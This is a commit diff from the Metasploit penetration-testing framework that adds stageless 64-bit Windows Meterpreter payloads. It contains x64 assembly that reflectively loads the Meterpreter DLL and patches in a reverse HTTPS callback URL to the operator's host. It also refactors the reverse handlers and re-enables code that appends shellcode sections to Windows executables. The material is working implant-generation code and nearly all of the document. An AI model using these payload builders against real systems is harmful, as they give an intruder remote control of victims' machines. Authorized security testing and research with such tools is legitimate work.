Lands rapid7#5032, stageless meterpreter 64-bit

Author: HD Moore

lib/msf/core/handler/reverse_http/stageless.rb

@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/parser/x509_certificate'
+
+module Msf
+
+##
+#
+# Helper functionality for handling of stageless http(s) payloads
+#
+##
+
+module Handler::ReverseHttp::Stageless
+
+  include Msf::Payload::Windows::VerifySsl
+
+  def initialize_stageless
+    register_options([
+      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
+    ], self.class)
+  end
+
+  def generate_stageless(&block)
+    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
+    rand = Rex::Text.rand_text_alphanumeric(16)
+    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
+
+    unless block_given?
+      raise ArgumentError, "Stageless generation requires a block argument"
+    end
+
+    # invoke the given function to generate the architecture specific payload
+    block.call(url) do |dll|
+
+      # TODO: figure out this bit
+      # patch the target ID into the URI if specified
+      #if opts[:target_id]
+      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
+      #  if i
+      #    t = opts[:target_id].to_s
+      #    raise "Target ID must be less than 5 bytes" if t.length > 4
+      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
+      #    print_status("Patching Target ID #{t} into DLL")
+      #    dll[i, u.length] = u
+      #  end
+      #end
+
+      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                           datastore['HandlerSSLCert'])
+
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
+        :url           => url,
+        :ssl           => true,
+        :ssl_cert_hash => verify_cert_hash,
+        :expiration    => datastore['SessionExpirationTimeout'].to_i,
+        :comm_timeout  => datastore['SessionCommunicationTimeout'].to_i,
+        :ua            => datastore['MeterpreterUserAgent'],
+        :proxy_host    => datastore['PayloadProxyHost'],
+        :proxy_port    => datastore['PayloadProxyPort'],
+        :proxy_type    => datastore['PayloadProxyType'],
+        :proxy_user    => datastore['PayloadProxyUser'],
+        :proxy_pass    => datastore['PayloadProxyPass'])
+    end
+
+  end
+
+end
+
+end

lib/msf/core/payload/windows/stageless_meterpreter.rb

@@ -51,7 +51,7 @@ def asm_invoke_metsrv(opts={})
     asm
   end
 
-  def generate_stageless_meterpreter(url = nil)
+  def generate_stageless_x86(url = nil)
     dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
 
     conf = {

lib/msf/core/payload/windows/x64/stageless_meterpreter.rb

@@ -0,0 +1,111 @@
+#-*- coding: binary -*-
+
+require 'msf/core'
+require 'rex/payloads/meterpreter/patch'
+
+module Msf
+
+##
+#
+# Implements stageless invocation of metsrv in x64
+#
+##
+
+module Payload::Windows::StagelessMeterpreter_x64
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::ReflectiveDLLLoader
+
+  def asm_invoke_metsrv(opts={})
+    asm = %Q^
+        ; prologue
+          db 0x4d, 0x5a         ; 'MZ' = "pop r10"
+          push r10              ; back to where we started
+          push rbp              ; save rbp
+          mov rbp, rsp          ; set up a new stack frame
+          sub rsp, 32           ; allocate some space for calls.
+        ; GetPC
+          call $+5              ; relative call to get location
+          pop rbx               ; pop return value
+        ; Invoke ReflectiveLoader()
+          ; add the offset to ReflectiveLoader()
+          add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
+          call rbx              ; invoke ReflectiveLoader()
+        ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
+          ; offset from ReflectiveLoader() to the end of the DLL
+          add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
+          mov r8, rbx           ; r8 points to the extension list
+          mov rbx, rax          ; save DllMain for another call
+          push 4                ; push up 4, indicate that we have attached
+          pop rdx               ; pop 4 into rdx
+          call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
+        ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
+          ; push the exitfunk value onto the stack
+          mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
+          push 5                ; push 5, indicate that we have detached
+          pop rdx               ; pop 5 into rdx
+          call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
+    ^
+
+    asm
+  end
+
+  def generate_stageless_x64(url = nil)
+    dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
+
+    conf = {
+      :rdi_offset => offset,
+      :length     => dll.length,
+      :exitfunk   => datastore['EXITFUNC']
+    }
+
+    asm = asm_invoke_metsrv(conf)
+
+    # generate the bootstrap asm
+    bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
+
+    # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
+    if bootstrap.length > 62
+      print_error("Stageless Meterpreter generated with oversized x64 bootstrap.")
+      return
+    end
+
+    # patch the binary with all the stuff
+    dll[0, bootstrap.length] = bootstrap
+
+    # the URL might not be given, as it might be patched in some other way
+    if url
+      # Patch the URL using the patcher as this upports both ASCII and WCHAR.
+      unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
+        # If the patching failed this could mean that we are somehow
+        # working with outdated binaries, so try to patch with the
+        # old stuff.
+        Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
+      end
+    end
+
+    # if a block is given then call that with the meterpreter dll
+    # so that custom patching can happen if required
+    yield dll if block_given?
+
+    # append each extension to the payload, including
+    # the size of the extension
+    unless datastore['EXTENSIONS'].nil?
+      datastore['EXTENSIONS'].split(',').each do |e|
+        e = e.strip.downcase
+        ext, o = load_rdi_dll(MeterpreterBinaries.path("ext_server_#{e}", 'x64.dll'))
+
+        # append the size, offset to RDI and the payload itself
+        dll << [ext.length].pack('V') + ext
+      end
+    end
+
+    # Terminate the "list" of extensions
+    dll + [0].pack('V')
+  end
+
+end
+
+end
+

lib/msf/util/exe.rb

@@ -183,12 +183,8 @@ def self.to_win32pe(framework, code, opts = {})
     payload = win32_rwx_exec(code)
 
     # Create a new PE object and run through sanity checks
-    fsize = File.size(opts[:template])
     pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
 
-    text = nil
-    pe.sections.each {|sec| text = sec if sec.name == ".text"}
-
     #try to inject code into executable by adding a section without affecting executable behavior
     if opts[:inject]
       injector = Msf::Exe::SegmentInjector.new({
@@ -199,6 +195,9 @@ def self.to_win32pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
+    text = nil
+    pe.sections.each {|sec| text = sec if sec.name == ".text"}
+
     raise RuntimeError, "No .text section found in the template" unless text
 
     unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
@@ -521,19 +520,16 @@ def self.to_win64pe(framework, code, opts = {})
       return injector.generate_pe
     end
 
-    opts[:exe_type] = :exe_sub
-    return exe_sub_method(code,opts)
+    #opts[:exe_type] = :exe_sub
+    #return exe_sub_method(code,opts)
 
-    #
-    # TODO: 64-bit support is currently failing to stage
-    #
     # Append a new section instead
-    # appender = Msf::Exe::SegmentAppender.new({
-    #   :payload  => code,
-    #   :template => opts[:template],
-    #   :arch     => :x64
-    # })
-    # return appender.generate_pe
+    appender = Msf::Exe::SegmentAppender.new({
+      :payload  => code,
+      :template => opts[:template],
+      :arch     => :x64
+    })
+    return appender.generate_pe
   end
 
   # Embeds shellcode within a Windows PE file implementing the Windows

modules/payloads/singles/windows/meterpreter_bind_tcp.rb

@@ -9,7 +9,7 @@
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
@@ -37,7 +37,7 @@ def initialize(info = {})
   def generate
     # blank LHOST indicates bind payload
     url = "tcp://:#{datastore['LPORT']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -5,18 +5,18 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/handler/reverse_http/stageless'
 require 'msf/core/payload/windows/stageless_meterpreter'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
-require 'rex/parser/x509_certificate'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::StagelessMeterpreter
+  include Msf::Handler::ReverseHttp::Stageless
   include Msf::Sessions::MeterpreterOptions
-  include Msf::Payload::Windows::VerifySsl
 
   def initialize(info = {})
 
@@ -31,48 +31,13 @@ def initialize(info = {})
       'Session'     => Msf::Sessions::Meterpreter_x86_Win
       ))
 
-    register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
-    ], self.class)
+    initialize_stageless
   end
 
   def generate
-    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
-    rand = Rex::Text.rand_text_alphanumeric(16)
-    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
-
-    generate_stageless_meterpreter(url) do |dll|
-
-      # TODO: figure out this bit
-      # patch the target ID into the URI if specified
-      #if opts[:target_id]
-      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
-      #  if i
-      #    t = opts[:target_id].to_s
-      #    raise "Target ID must be less than 5 bytes" if t.length > 4
-      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
-      #    print_status("Patching Target ID #{t} into DLL")
-      #    dll[i, u.length] = u
-      #  end
-      #end
-
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
-
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
-        :url            => url,
-        :ssl            => true,
-        :ssl_cert_hash  => verify_cert_hash,
-        :expiration     => datastore['SessionExpirationTimeout'].to_i,
-        :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
-        :ua             => datastore['MeterpreterUserAgent'],
-        :proxy_host     => datastore['PayloadProxyHost'],
-        :proxy_port     => datastore['PayloadProxyPort'],
-        :proxy_type     => datastore['PayloadProxyType'],
-        :proxy_user     => datastore['PayloadProxyUser'],
-        :proxy_pass     => datastore['PayloadProxyPass'])
-    end
-
+    # generate a stageless payload using the x86 version of
+    # the stageless generator
+    generate_stageless(&method(:generate_stageless_x86))
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb

@@ -9,7 +9,7 @@
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
@@ -37,7 +37,7 @@ def initialize(info = {})
 
   def generate
     url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end

modules/payloads/singles/windows/meterpreter_reverse_tcp.rb

@@ -36,7 +36,7 @@ def initialize(info = {})
 
   def generate
     url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
-    generate_stageless_meterpreter(url)
+    generate_stageless_x86(url)
   end
 
 end